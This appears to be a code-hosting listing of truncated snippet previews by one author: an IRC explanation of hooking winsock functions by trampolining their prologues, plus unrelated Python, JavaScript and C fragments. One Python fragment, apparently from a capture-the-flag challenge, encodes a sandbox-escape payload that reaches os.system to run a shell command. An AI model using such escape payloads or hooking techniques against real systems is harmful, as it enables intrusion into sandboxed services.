| <Daeken> well, it's actually pretty straightforward. i'm interested in the following functions: connect(), getpeername(), and closesocket() | |
| <Daeken> all of which are part of winsock and reside in ws2_32.dll | |
| <Daeken> winsock's functions all happen to have the same prolog (what sets up a function): mov edi, edi; push ebp; mov ebp, esp | |
| <Daeken> those three instructions happen to take up 5 bytes (2, 1, 2, respectively), the same size as a 32-bit jump. so these functions are candidates for trampolining. | |
| <Daeken> now, what that means is that you patch the beginning of the function with a jump to your own custom version of the function. this is advantageous in that any way you call the patched function, it ends up calling your replacement. | |
| <Daeken> so you patch beginning of the function with a jump to your replacement, and write the replacement just like you'd write it if you were to implement the function normally -- nothing special at all. | |
| <Daeken> now, where it gets a bit complex is if you want to call the |
| from os.path import isfile | |
| from glob import glob | |
| for fn in glob('*'): | |
| if not isfile(fn): | |
| continue | |
| try: | |
| file(fn, 'rb').read().decode('utf-8') | |
| except UnicodeDecodeError: | |
| print fn |
| from functools import * | |
| partial_left = partial | |
| partial_right = lambda f, *args, **kwargs: inner_func(lambda *xargs, **xkwargs: f(*(xargs+args), **dict(kwargs, **xkwargs)), f) | |
| inner_func = lambda f, i=None: (setattr(f, 'func_inner', inner_func(i)) or f) if i else (f.func_inner if hasattr(f, 'func_inner') else f) | |
| if_ = lambda cond, _if, _else: _if() if cond else _else() | |
| maybe = lambda x, alt=None: x if x is not None else alt | |
| call_maybe = lambda func, x, alt=None: func(x) if x is not None else alt | |
| call = lambda x: x() | |
| impartial = lambda f, b, a=0: inner_func(lambda *args, **kwargs: f(*args[b:len(args)-a], **kwargs), f) |
| from funcpy import * | |
| class Chord(object): | |
| _chord_active = None | |
| def __init__(self): | |
| self._chord_queue = [] | |
| methods = {} | |
| for method in self.chord_methods.split(' '): | |
| methods[method] = rename_func(decorate(lambda name, *args: self._chord(name, args))(method), method) |
| (function() { | |
| NodeList.prototype.forEach = Array.prototype.forEach; | |
| var daeslide = window.daeslide = function(root) { | |
| this.root = document.querySelector(root); | |
| this.slides = []; | |
| this._transition = [0, 'linear']; | |
| this.curSlide = undefined; | |
| this.affected = {hidden: {}}; | |
| this._slideNum = -1; |
| # -*- coding: utf-8 -*- | |
| from sys import exit | |
| rw = lambda x: str(x).replace('-2', "~({}<())").replace('-1', "~(''<'')").replace('0', "~~(''<'')").replace('1', "~~({}<())") | |
| disallowed = '!"#$&*+-/0123456789;=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\\^abcdefghijklmnopqrstuvwxyz|\r' | |
| #payload = "().__class__.__subclasses__()[0].__new__.__globals__['__builtins__']['input']()" | |
| payload = "().__class__.__bases__[0].__subclasses__()[48].__init__.__globals__['linecache'].os.system('find /home')" | |
| fstr = '' | |
| for i, c in enumerate(payload): |
| class Profile(db.Model): | |
| user = db.UserProperty() | |
| nickname = db.TextProperty() | |
| desc = db.TextProperty() | |
| pic = db.TextProperty() | |
| def html_desc(self): | |
| def rep(match): | |
| sub = match.group(1) | |
| if '|' not in sub: |
| from random import randrange as rand | |
| nonlands = 53 | |
| lands = 28 | |
| total = nonlands + lands | |
| print 'Total cards:', total | |
| tlands = 0 | |
| samples = 100000 | |
| for i in xrange(samples): |
| #define debugreg(reg) printf(#reg ": %08x\n", psxRegs.GPR.n.reg) | |
| // interpreter execution | |
| static inline void execI() { | |
| u32 *code = Read_ICache(psxRegs.pc, FALSE); | |
| if(code != NULL && SWAP32(*code) == 0xDEADBEEF) { | |
| printf("===== DEBUG =====\n"); | |
| printf("pc: %08x\n", psxRegs.pc); | |
| debugreg(r0); | |
| debugreg(at); |